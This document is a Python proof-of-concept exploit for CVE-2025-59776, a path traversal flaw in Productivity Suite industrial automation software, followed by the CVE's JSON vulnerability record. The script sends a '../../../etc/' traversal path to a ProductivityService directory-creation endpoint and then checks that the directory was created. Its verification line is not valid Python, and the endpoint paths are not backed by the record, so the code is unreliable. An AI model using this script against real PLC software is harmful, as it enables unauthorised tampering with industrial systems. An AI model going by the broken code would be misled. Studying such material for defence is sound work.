CVE-2025-59776

import requests # CVE-2025-59776 Path Traversal PoC # Target: Productivity Suite Software v4.4.1.19 # Vulnerability: Relative Path Traversal in ProductivityService target_ip = "<target_ip>" target_port = 12345 # Default ProductivityService port def exploit_path_traversal(): """ Exploit path traversal to create arbitrary directories on the target machine via ProductivityService PLC simulator """ # Construct malicious path with path traversal sequences malicious_path = "../../../etc/test_directory" # Target endpoint for PLC simulator interaction url = f"http://{target_ip}:{target_port}/ProductivityService/api/directory/create" # Payload with path traversal payload = { "path": malicious_path, "action": "create" } headers = { "Content-Type": "application/json", "User-Agent": "ProductivitySuite-Client/4.4.1.19" } try: response = requests.post(url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Successfully created directory via path traversal") print(f"[+] Response: {response.text}") return True else: print(f"[-] Failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_directory_creation(): """ Verify if directory was created at unexpected location """ check_url = f"http://{target_ip}:{target_port}/ProductivityService/api/directory/exists" payload = { "path": "../../../etc/test_directory" } try: response = requests.post(check_url, json=payload, timeout=10) if "exists": true in response.text: print("[+] Directory creation confirmed - vulnerability is exploitable") return True except: pass return False if __name__ == "__main__": print("CVE-2025-59776 Path Traversal Exploitation") print("Target: Productivity Suite v4.4.1.19") print("-" * 50) if exploit_path_traversal(): verify_directory_creation()

{"cve": {"id": "CVE-2025-59776", "sourceIdentifier": "[email protected]", "published": "2025-10-23T23:15:37.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability was discovered in Productivity Suite software version 4.4.1.19. The vulnerability allows an unauthenticated remote attacker to interact with the ProductivityService PLC simulator and create arbitrary directories on the target machine."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-296-01.json", "source": "[email protected]"}, {"url": "https://support.automationdirect.com/docs/securityconsiderations.pdf", "source": "[email protected]"}, {"url": "https://www.automationdirect.com/support/software-downloads", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-296-01", "source": "[email protected]"}]}}